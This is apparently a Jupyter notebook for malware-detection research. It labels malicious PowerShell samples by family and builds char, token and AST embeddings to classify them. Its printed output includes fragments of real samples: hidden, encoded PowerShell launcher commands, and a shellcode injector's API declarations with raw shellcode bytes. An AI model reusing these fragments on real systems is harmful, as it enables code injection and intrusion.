## Proceed CSV

In [ ]:
# prompt: đọc file csv từ path: /content/drive/MyDrive/dacn/data_unit42.csv

import pandas as pd

# Đường dẫn đến file CSV
file_path = '/content/drive/MyDrive/dacn/data_42.csv'

# Đọc file CSV vào DataFrame
try:
  df = pd.read_csv(file_path)
except Exception as e:
  print(f"Error: {e}")

In [ ]:
print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

In [ ]:
import re

def extract_executable(input_string):
    # Biểu thức chính quy để tìm các chuỗi 'powershell.exe' có thể có đường dẫn đầy đủ hoặc chỉ là tên tệp
    pattern = re.compile(r'\\\"(.*?)\\\"|(\S+\.exe)|\bpowershell\b', re.IGNORECASE)


    match = pattern.search(input_string)
    if match:
        # Kiểm tra và trả về nhóm phù hợp
        if match.group(1):
            result = match.group(1)
        elif match.group(2):
            result = match.group(2)
        else:
            result = match.group(0)
        # Loại bỏ ký tự "
        result = result.replace('"', '')
        return result
    return None

# Áp dụng hàm extract_executable lên cột 'Original Code' và tạo cột mới 'Path Exec'
df['Path Exec'] = df['Original Code'].apply(extract_executable)

print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

In [ ]:
from dataclasses import replace

# Assuming df is your DataFrame

def combine_attributes(row):
    """Combines the values of Original Code, Obfuscated Code, and Family Name."""
    Path_Exec = str(row['Path Exec'])
    Arguments = re.sub(r"[\[\]',]", '', str(row['Arguments']))
    Payload = str(row['B64 Decoded'])
    # Customize the separator if needed
    combined_value = f"{Path_Exec} | {Arguments} | {Payload}"
    combined_value = combined_value.replace('|','')
    return combined_value

df['Full Payload'] = df.apply(combine_attributes, axis=1)

print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

In [ ]:
# prompt: in ra các giá trị của trường Family Name

print(df['Family Name'].unique())

['Shellcode Inject' 'Downloader DFSP' 'Powerfun Reverse' 'SET'
 'Downloader DFSP 2X' 'Unicorn' 'PowerShell Empire' 'Downloader Proxy'
 'Meterpreter RHTTP' 'Scheduled Task COM' 'Downloader IEXDS' 'Unknown'
 'AMSI Bypass' 'VB Task' 'Veil Stream' 'PowerWorm' 'Remote DLL'
 'Downloader Kraken' 'TXT C2' 'BITSTransfer' 'Downloader DFSP DPL'
 'Powerfun Bind' 'Unicorn Modified' 'PowerSploit GTS' 'DynAmite Launcher'
 'Remove AV' 'DynAmite KL']


### Convert Family Name -> Label:  Bypass, Downloader, Injector, Payload, TaskExecution


Bypass:
- AMSI Bypass

Downloader:
- Downloader DFSP
- Downloader DFSP 2X
- Downloader DFSP DPL
- Downloader IEXDS
- Downloader Kraken
- Downloader Proxy
- BITSTransfer

Injector:
- Shellcode Inject
- Remote DLL
- Meterpreter RHTTP
- PowerSploit GTS

Payload:
- Powerfun Reverse
- Unicorn
- Unicorn Modified
- PowerShell Empire
- PowerWorm
- TXT C2
- Veil Stream
- DynAmite Launcher
- DynAmite KL

TaskExecution:
- SET
- Scheduled Task COM
- VB Task
- Powerfun Bind
- Remove AV
- Unknown



In [ ]:


def map_family_to_label(family_name):
    if 'Bypass' in family_name or 'Remove AV' in family_name:
        return 'Bypass'
    elif 'Downloader' in family_name or 'Transfer' in family_name:
        return 'Downloader'
    elif 'Inject' in family_name or 'Trojan' in family_name or 'Unicorn' in family_name:
        return 'Injector'
    elif 'Power' in family_name or 'Empire' in family_name or 'Payload' in family_name:
        return 'Payload'
    elif 'Task' in family_name or 'COM' in family_name or 'Scheduled' in family_name:
        return 'TaskExecution'
    else:
        return 'Unknown'

df['Label'] = df['Family Name'].apply(map_family_to_label)
print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

In [ ]:
# prompt: loại bỏ các row có giá trị là unknow có ở cột Label, và hiện số dòng đã loại bỏ

import pandas as pd

# Loại bỏ các hàng có giá trị 'Unknown' trong cột 'Label'
rows_before = len(df)
df = df[df['Label'] != 'Unknown']
rows_after = len(df)
rows_removed = rows_before - rows_after
print(f"Số dòng đã loại bỏ: {rows_removed}")


Số dòng đã loại bỏ: 337


In [ ]:


# Thống kê số lượng mẫu cho mỗi Label
label_counts = df['Label'].value_counts()
print("\nThống kê số lượng mẫu cho mỗi Label:")
print(label_counts)

# Tính tỷ lệ phần trăm cho mỗi Label
label_percentages = (label_counts / len(df)) * 100
print("\nTỷ lệ phần trăm cho mỗi Label:")
label_percentages


Thống kê số lượng mẫu cho mỗi Label:
Label
Injector         1772
Downloader       1522
Payload           417
TaskExecution      21
Bypass             10
Name: count, dtype: int64

Tỷ lệ phần trăm cho mỗi Label:


,count
Label,
Injector,47.354356
Downloader,40.673437
Payload,11.143773
TaskExecution,0.561197
Bypass,0.267237


In [ ]:


# Lưu DataFrame vào file CSV
output_file_path = '/content/processed_data.csv'  # Thay đổi đường dẫn nếu cần
df.to_csv(output_file_path, index=False)


## Token

### Char2Vec "[Path Exec, Argument, Payload Encode]"

In [ ]:
import pandas as pd
from gensim.models import Word2Vec

def char2vec_for_columns(df, column_names, vector_size=128, window=5, min_count=1, workers=4):
    for column_name in column_names:
        sentences = []
        for code in df[column_name]:
            if isinstance(code, str):  # Chỉ xử lý chuỗi ký tự
                chars = list(code)
                sentences.append(chars)  # Mỗi phần tử là một danh sách các ký tự đơn lẻ

        # Huấn luyện mô hình Word2Vec
        model = Word2Vec(sentences, vector_size=vector_size, window=window, min_count=min_count, workers=workers)

        # Lưu model
        model_path = f"{column_name}_char2vec.model"
        model.save(model_path)
        print(f"Model '{column_name}_char2vec' đã được lưu tại: {model_path}")

        # In ra từ điển của model để kiểm tra
        print(f"Từ điển của model '{column_name}_char2vec':", model.wv.index_to_key)

        # Tạo cột mới chứa vector char2vec

        df["char2vec"] = df[column_name].apply(
            lambda code: [model.wv[char] for char in list(code) if char in model.wv] if isinstance(code, str) else []
        )

    return df

# Ví dụ sử dụng:
column_names_to_process = ['Full Payload']  # Thay thế bằng danh sách cột bạn muốn xử lý
df_with_char2vec = char2vec_for_columns(df, column_names_to_process)

# Load và kiểm tra model
loaded_model = Word2Vec.load("Full Payload_char2vec.model")
print("Kiểm tra từ điển của model đã load:", loaded_model.wv.index_to_key)
print("Kích thước vector:", loaded_model.vector_size)


Model 'Full Payload_char2vec' đã được lưu tại: Full Payload_char2vec.model
Từ điển của model 'Full Payload_char2vec': ['0', ',', 'x', 'e', 't', ' ', 'c', 'd', 'a', '5', 'n', 'r', '8', 'l', 'f', 'i', '1', '6', '3', '2', 'b', '4', 's', 'o', '7', '9', '$', '.', 'p', ';', 'w', 'P', '\\', 'm', '(', ')', 'u', 'I', '-', 'h', 'A', 'S', 'T', ':', '"', 'g', 'y', ']', '[', 'W', '=', 'C', 'D', 'z', 'v', "'", 'N', 'k', '/', 'E', 'L', '+', 'F', 'B', 'O', 'V', '}', 'R', '{', 'j', 'H', 'M', 'X', 'U', 'G', 'Y', 'K', 'J', 'q', 'Z', 'Q', '~', '\n', '\r', '%', '_', '\x1d', '&', '!', '#', '?', '`', '*', '@', '>', '^', '<']
Kiểm tra từ điển của model đã load: ['0', ',', 'x', 'e', 't', ' ', 'c', 'd', 'a', '5', 'n', 'r', '8', 'l', 'f', 'i', '1', '6', '3', '2', 'b', '4', 's', 'o', '7', '9', '$', '.', 'p', ';', 'w', 'P', '\\', 'm', '(', ')', 'u', 'I', '-', 'h', 'A', 'S', 'T', ':', '"', 'g', 'y', ']', '[', 'W', '=', 'C', 'D', 'z', 'v', "'", 'N', 'k', '/', 'E', 'L', '+', 'F', 'B', 'O', 'V', '}', 'R', '{', 'j', 'H

In [ ]:
# import pandas as pd
# from gensim.models import Word2Vec

# def optimized_char2vec_for_columns(df, column_names, vector_size=128, window=5, min_count=1, workers=4):
#     for column_name in column_names:
#         # Kiểm tra xem cột có tồn tại trong DataFrame
#         if column_name not in df.columns:
#             print(f"Cột '{column_name}' không tồn tại trong DataFrame.")
#             continue

#         # Chuẩn bị danh sách các câu ký tự cho cột hiện tại
#         sentences = [list(code) for code in df[column_name].values if isinstance(code, str)]

#         # Huấn luyện mô hình Word2Vec
#         model = Word2Vec(sentences, vector_size=vector_size, window=window, min_count=min_count, workers=workers)

#         # Lưu mô hình vào file với tên riêng cho mỗi cột
#         model_path = f"char2vec.model"
#         model.save(model_path)
#         print(f"Đã lưu mô hình 'char2vec' tại: {model_path}")

#         # Tạo cột mới cho các vector embedding char2vec

#         df["char2vec"] = df[column_name].apply(
#             lambda code: [model.wv[char] for char in list(code) if char in model.wv] if isinstance(code, str) else []
#         )

#     return df

# # Ví dụ sử dụng
# column_names_to_process = ['Full Payload']  # Thay thế bằng danh sách cột bạn muốn xử lý
# df_with_char2vec = optimized_char2vec_for_columns(df, column_names_to_process)


In [ ]:
import numpy as np

def optimized_char2vec_for_columns(df, column_names, vector_size=128, window=5, min_count=1, workers=4):
    for column_name in column_names:
        # Kiểm tra xem cột có tồn tại trong DataFrame
        if column_name not in df.columns:
            print(f"Cột '{column_name}' không tồn tại trong DataFrame.")
            continue

        # Chuẩn bị danh sách các câu ký tự cho cột hiện tại
        sentences = [list(code) for code in df[column_name].values if isinstance(code, str)]

        # Huấn luyện mô hình Word2Vec
        model = Word2Vec(sentences, vector_size=vector_size, window=window, min_count=min_count, workers=workers)

        # # Lưu mô hình vào file với tên riêng cho mỗi cột
        # model_path = f"{column_name}_char2vec.model"
        # model.save(model_path)
        # print(f"Đã lưu mô hình '{column_name}_char2vec' tại: {model_path}")

        # Tạo cột mới cho vector embedding char2vec trung bình của mỗi chuỗi
        # new_column_name = f"{column_name}_char2vec"
        df["char2vec"] = df[column_name].apply(
            lambda code: np.mean([model.wv[char] for char in list(code) if char in model.wv], axis=0) if isinstance(code, str) else np.zeros(vector_size)
        )

    return df

# Ví dụ sử dụng
column_names_to_process = ['Full Payload']  # Thay thế bằng danh sách cột bạn muốn xử lý
df_with_char2vec = optimized_char2vec_for_columns(df, column_names_to_process)


In [ ]:
# print(len(df_with_char2vec['Full Payload_char2vec'][0]))

In [ ]:
print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

### Token2Vec ['full_code_pw']

#### token
"token" refers to individual components or words extracted from a PowerShell script, such as commands, variables, functions, parameters, and keywords.

In [ ]:
# # prompt: lưu csv

# # Lưu DataFrame vào file CSV
# df.to_csv('processed_data.csv', index=False)  # Thay 'processed_data.csv' bằng tên file mong muốn

### extract token advanced
Cmdlets: Regex tìm các cmdlet cụ thể (ví dụ: New-Object, Start-Process). Để mở rộng, bạn có thể thêm các cmdlet khác.

Variables: Tìm các biến PowerShell bắt đầu bằng $.

Functions: Tìm các định nghĩa hàm (sử dụng từ khóa function).

Keywords: Nhận diện các từ khóa điều khiển như if, else, for, while, và return.

Parameters: Trích xuất tham số bắt đầu bằng dấu -, thường là tham số của cmdlet.
Strings: Tìm chuỗi được đặt trong dấu "".

In [ ]:
# import pandas as pd
# from gensim.models import Word2Vec
# from sklearn.feature_extraction.text import TfidfVectorizer
# import re
# import numpy as np

# # Hàm trích xuất token đặc trưng từ PowerShell script
# def extract_tokens(script):
#     cmdlets = re.findall(r'\b(?:Invoke-Expression|Invoke-Command|Start-Process|New-Object|Set-ExecutionPolicy|Get-Content|Add-Type|Invoke-WebRequest|Invoke-RestMethod|Get-WmiObject|Out-File|New-Service|Remove-Item)\b', script)  # Thêm các Cmdlets khác
#     variables = re.findall(r'\$[a-zA-Z_][\w]*', script)
#     functions = re.findall(r'\bfunction\s+\w+', script)
#     keywords = re.findall(r'\b(?:if|else|for|while|return)\b', script)  # Các từ khóa PowerShell
#     parameters = re.findall(r'-\w+', script)
#     strings = re.findall(r'".+?"', script)  # Nhận diện chuỗi trong script

#     return cmdlets + variables + functions + keywords + parameters + strings

# # Áp dụng TF-IDF để tính trọng số cho các token
# def calculate_tfidf_weights(df, column_name):
#     vectorizer = TfidfVectorizer(tokenizer=extract_tokens)
#     tfidf_matrix = vectorizer.fit_transform(df[column_name].astype(str))
#     feature_names = vectorizer.get_feature_names_out()
#     return tfidf_matrix, feature_names

# # Huấn luyện Token2Vec dựa trên token của các script
# def token2vec_for_columns(df, column_name, vector_size=128, window=5, min_count=1, workers=4):
#     df['tokens'] = df[column_name].apply(lambda script: extract_tokens(script) if isinstance(script, str) else [])

#     # Huấn luyện Word2Vec trên các token đã trích xuất
#     model = Word2Vec(df['tokens'].tolist(), vector_size=vector_size, window=window, min_count=min_count, workers=workers)

#     # Tạo vector đại diện cho mỗi script bằng trung bình các vector token
#     df['token_sequence_vector'] = df['tokens'].apply(
#         lambda tokens: np.mean([model.wv[token] for token in tokens if token in model.wv], axis=0) if tokens else np.zeros(vector_size)
#     )

#     return df, model

# # Ví dụ sử dụng


# # Tính trọng số cho các token đặc trưng và lưu vector script
# tfidf_matrix, feature_names = calculate_tfidf_weights(df, 'Full Payload')
# df_with_token2vec, token2vec_model = token2vec_for_columns(df, 'Full Payload')

# # Kiểm tra kết quả
# print(df_with_token2vec[['tokens', 'token_sequence_vector']])


In [ ]:
import pandas as pd
from gensim.models import Word2Vec
from sklearn.feature_extraction.text import TfidfVectorizer
import re
import numpy as np

# Hàm trích xuất token đặc trưng từ PowerShell script
def extract_tokens(script):
    cmdlets = re.findall(r'\b(?:Invoke-Expression|Invoke-Command|Start-Process|New-Object|Set-ExecutionPolicy|Get-Content|Add-Type|Invoke-WebRequest|Invoke-RestMethod|Get-WmiObject|Out-File|New-Service|Remove-Item)\b', script)
    variables = re.findall(r'\$[a-zA-Z_][\w]*', script)
    functions = re.findall(r'\bfunction\s+\w+', script)
    keywords = re.findall(r'\b(?:if|else|for|while|return)\b', script)
    parameters = re.findall(r'-\w+', script)
    strings = re.findall(r'".+?"', script)

    return cmdlets + variables + functions + keywords + parameters + strings

# Áp dụng TF-IDF để tính trọng số cho các token
def calculate_tfidf_weights(df, column_name):
    vectorizer = TfidfVectorizer(tokenizer=extract_tokens)
    tfidf_matrix = vectorizer.fit_transform(df[column_name].astype(str))
    feature_names = vectorizer.get_feature_names_out()
    return tfidf_matrix, feature_names

# Huấn luyện Token2Vec và tạo vector đại diện cho mỗi script
def token2vec_for_columns(df, column_name, vector_size=128, window=5, min_count=1, workers=4):
    # Trích xuất tokens cho mỗi script và tạo danh sách tokens cho mô hình Word2Vec
    token_lists = [extract_tokens(script) for script in df[column_name].astype(str)]

    # Huấn luyện Word2Vec trên các token đã trích xuất
    model = Word2Vec(token_lists, vector_size=vector_size, window=window, min_count=min_count, workers=workers)

    # Tạo cột token2vec bằng trung bình các vector token cho mỗi script
    df['token2vec'] = [
        np.mean([model.wv[token] for token in tokens if token in model.wv], axis=0) if tokens else np.zeros(vector_size)
        for tokens in token_lists
    ]

    return df, model




In [ ]:
# Ví dụ sử dụng
column_names_to_process = ['Full Payload']
tfidf_matrix, feature_names = calculate_tfidf_weights(df, 'Full Payload')
df_with_token2vec, token2vec_model = token2vec_for_columns(df, 'Full Payload')

# Kiểm tra kết quả
print(df_with_token2vec[['token2vec']])

/usr/local/lib/python3.10/dist-packages/sklearn/feature_extraction/text.py:521: UserWarning: The parameter 'token_pattern' will not be used since 'tokenizer' is not None'
  warnings.warn(


                                              token2vec
0     [-0.187106, 0.53884494, -0.04917677, 0.2608150...
1     [0.38329202, -0.035958342, 0.7264, -0.2538795,...
2     [-0.2011344, 0.54473007, -0.032546394, 0.26752...
3     [0.1414523, -0.23123233, 0.4698063, 0.32132125...
4     [-0.1291613, 0.46982434, -0.019131232, 0.19264...
...                                                 ...
4074  [0.38329202, -0.035958342, 0.7264, -0.2538795,...
4075  [0.21593487, -0.302493, 0.6769256, -0.2771524,...
4076  [-0.17674883, 0.4634449, -0.0028612788, 0.2587...
4077  [0.38329202, -0.035958342, 0.7264, -0.2538795,...
4078  [-0.24186382, -0.8291651, 0.77429307, 0.304431...

[3742 rows x 1 columns]


In [ ]:

if 'token2vec_model' in locals():
  print("Mô hình Token2Vec đã được huấn luyện.")

  # Ví dụ: Lấy vector cho một token cụ thể
  sample_token = 'New-Object'  # Thay thế bằng một token có trong mô hình
  if sample_token in token2vec_model.wv:
    token_vector = token2vec_model.wv[sample_token]
    print(f"Vector cho token '{sample_token}': {token_vector}")
  else:
    print(f"Token '{sample_token}' không tồn tại trong mô hình.")

  # Ví dụ: Tính toán độ tương tự giữa hai token
  token1 = 'Start-Process'
  token2 = 'DownloadFile'
  if token1 in token2vec_model.wv and token2 in token2vec_model.wv:
    similarity = token2vec_model.wv.similarity(token1, token2)
    print(f"Độ tương tự giữa '{token1}' và '{token2}': {similarity}")
  else:
    print(f"Một hoặc cả hai token '{token1}' và '{token2}' không tồn tại trong mô hình.")

else:
  print("Mô hình Token2Vec chưa được huấn luyện.")



Mô hình Token2Vec đã được huấn luyện.
Vector cho token 'New-Object': [ 0.38006458 -0.11477029  0.5579613  -0.20664145  0.34805152 -0.2790925
 -0.37793836  1.1254216   0.00513271  0.12406822  0.8227647  -0.68154085
  0.22969577 -0.12917607 -0.282669   -0.65704596  0.07744794  0.31249183
 -0.5924915   0.20502907  0.44752088  0.18249722  0.44109794 -0.02348454
 -0.64470273  0.1844896  -0.5425942   0.14027761  0.22787377 -0.22556931
 -1.1264408   0.36941224 -0.32766986  0.20863074 -0.11097052  0.0921627
  0.77627134  0.2693625   0.33333632  0.10839628 -0.17936465  0.37152
 -0.06980474 -0.48793995  0.33326018 -0.18212156  0.06814019 -0.55809695
 -0.03082911  0.7137978  -0.03607707  0.5071811   1.0375183   0.20338029
  0.22222927  0.12200196  0.76420796  0.19697924 -0.1942432   0.05481435
  0.34066996 -0.4140428   0.3802671   0.03672447  0.6770454  -0.15846193
  0.2928596   0.5085076  -0.27070832 -0.49048713  0.54103655 -0.01734404
 -0.5052372  -0.18290377  0.28416607 -1.1589808   0.43684286

In [ ]:
# prompt: save model

# # Lưu trữ mô hình Token2Vec
# if 'token2vec_model' in locals():
#   token2vec_model.save("token2vec_model.model")
#   print("Mô hình Token2Vec đã được lưu.")
# else:
#   print("Mô hình Token2Vec chưa được huấn luyện.")

In [ ]:
print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

### AST token

In [ ]:
!pip install anytree

### ast2vec advanced
cải thiện: phân tích qua structure thay vì chỉ qua các keyword

### ast2vec


In [ ]:
import re
from anytree import Node, RenderTree
from gensim.models import Word2Vec
import numpy as np
import pandas as pd

# Lớp phân tích cú pháp PowerShell AST mở rộng
class EnhancedPowerShellASTParser:
    def __init__(self, code):
        self.code = code
        self.root = Node("Root")

    def parse_code(self):
        tokens = re.findall(r'\b\w+\b', self.code)
        current_node = self.root
        for token in tokens:
            # Xác định loại node dựa trên từ khóa hoặc cú pháp
            if token.lower() in ["function", "if", "foreach", "while", "try", "catch"]:
                node_type = f"{token.capitalize()}Statement"
                new_node = Node(node_type, parent=current_node)
            elif token.lower() in ["param", "return"]:
                new_node = Node("ParameterStatement", parent=current_node)
            elif token.lower() == "pipeline":
                new_node = Node("Pipeline", parent=current_node)
            elif token.lower() in ["cmdlet", "assignment"]:
                new_node = Node(f"{token.capitalize()}Node", parent=current_node)
            else:
                new_node = Node(token, parent=current_node)
        return self.root

    # Hàm duyệt cây theo thứ tự hậu kỳ để tạo chuỗi đặc trưng
    def postorder_traversal(self, node):
        sequence = []
        for child in node.children:
            sequence.extend(self.postorder_traversal(child))
        sequence.append(node.name)
        return sequence

    # Hàm in cấu trúc cây AST
    def print_ast_structure(self):
        ast_tree = self.parse_code()
        for pre, fill, node in RenderTree(ast_tree):
            print(f"{pre}{node.name}")

# Hàm xây dựng tập hợp đặc trưng từ cây AST
def build_feature_set_from_ast(ast_sequences):
    unique_features = set()
    for seq in ast_sequences:
        unique_features.update(seq)
    return list(unique_features)

# Hàm tính toán vector từ cho mỗi đặc trưng AST
def calculate_word_vectors(features, vector_size=128, window=5, min_count=1):
    model = Word2Vec(sentences=features, vector_size=vector_size, window=window, min_count=min_count)
    word_vectors = {word: model.wv[word] for word in model.wv.index_to_key}
    return word_vectors



# Hàm sinh vector AST cho mỗi mã PowerShell
def generate_ast_embedding(ast_sequence, word_vectors):
    embedding = np.mean([word_vectors[token] for token in ast_sequence if token in word_vectors], axis=0)
    return embedding






In [ ]:


# Bước 1: Khởi tạo parser, in cấu trúc AST, và xử lý từng đoạn mã PowerShell
ast_sequences = []
for script in df['Full Payload']:
    parser = EnhancedPowerShellASTParser(script)
    print(f"AST structure for script:\n{script}")
    parser.print_ast_structure()  # In cấu trúc cây AST
    ast_tree = parser.parse_code()
    sequence = parser.postorder_traversal(ast_tree)
    ast_sequences.append(sequence)
    print("\n" + "-"*50 + "\n")

# Bước 2: Xây dựng tập hợp đặc trưng và tính toán vector từ cho AST
features = build_feature_set_from_ast(ast_sequences)
word_vectors = calculate_word_vectors(ast_sequences)


# Tạo vector AST cho từng mã PowerShell
ast_embeddings = [generate_ast_embedding(seq, word_vectors) for seq in ast_sequences]
df['ast2vec'] = ast_embeddings

Streaming output truncated to the last 5000 lines.
├── flAllocationType
├── uint
├── flProtect
├── DllImport
├── kernel32
├── dll
├── public
├── static
├── extern
├── IntPtr
├── CreateThread
├── IntPtr
├── lpThreadAttributes
├── uint
├── dwStackSize
├── IntPtr
├── lpStartAddress
├── IntPtr
├── lpParameter
├── uint
├── dwCreationFlags
├── IntPtr
├── lpThreadId
├── DllImport
├── msvcrt
├── dll
├── public
├── static
├── extern
├── IntPtr
├── memset
├── IntPtr
├── dest
├── uint
├── src
├── uint
├── count
├── w
├── Add
├── Type
├── memberDefinition
├── c
├── Name
├── Win32
├── namespace
├── Win32Functions
├── passthru
├── Byte
├── Byte
├── z
├── 0xfc
├── 0xe8
├── 0x89
├── 0x00
├── 0x00
├── 0x00
├── 0x60
├── 0x89
├── 0xe5
├── 0x31
├── 0xd2
├── 0x64
├── 0x8b
├── 0x52
├── 0x30
├── 0x8b
├── 0x52
├── 0x0c
├── 0x8b
├── 0x52
├── 0x14
├── 0x8b
├── 0x72
├── 0x28
├── 0x0f
├── 0xb7
├── 0x4a
├── 0x26
├── 0x31
├── 0xff
├── 0x31
├── 0xc0
├── 0xac
├── 0x3c
├── 0x61
├── 0x7c
├── 0x02
├── 0x2c
├── 0x20
├── 

In [ ]:
df['ast2vec'] = ast_embeddings

In [ ]:
print(df.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

###Fushion Vector

##fusion vector 8/11

In [ ]:
import numpy as np

def combine_embeddings(df, char2vec_col, token2vec_col, ast2vec_col):
    char2vec_dim = len(df[char2vec_col][0])
    token2vec_dim = len(df[token2vec_col][0])
    ast2vec_dim = len(df[ast2vec_col][0])
    #Kiểm tra nếu tất cả các vector đều có cùng kích thước
    if not all(len(df[char2vec_col][0]) == len(vec) for vec in df[char2vec_col]):
        raise ValueError("Kích thước của char2vec không đồng đều.")
    if not all(len(df[token2vec_col][0]) == len(vec) for vec in df[token2vec_col]):
        raise ValueError("Kích thước của token2vec không đồng đều.")
    if not all(len(df[ast2vec_col][0]) == len(vec) for vec in df[ast2vec_col]):
        raise ValueError("Kích thước của ast2vec không đồng đều.")


    #Kết hợp các vector
    df['combined_embedding'] = df.apply(lambda row: np.concatenate(
        [row[char2vec_col], row[token2vec_col], row[ast2vec_col]]
    ), axis=1)

    return df

# Ví dụ sử dụng
df_with_combined = combine_embeddings(df_with_char2vec, 'char2vec', 'token2vec', 'ast2vec')


In [ ]:
print(df_with_combined.head())

                                       Original Code  \
0  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
1  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
2  "\"C:\\Windows\\System32\\WindowsPowerShell\\v...   
3  "powershell.exe  -nop -wind hidden -Exec Bypas...   
4  "powershell -window hidden -enc JAAxACAAPQAgAC...   

                                            Filename  \
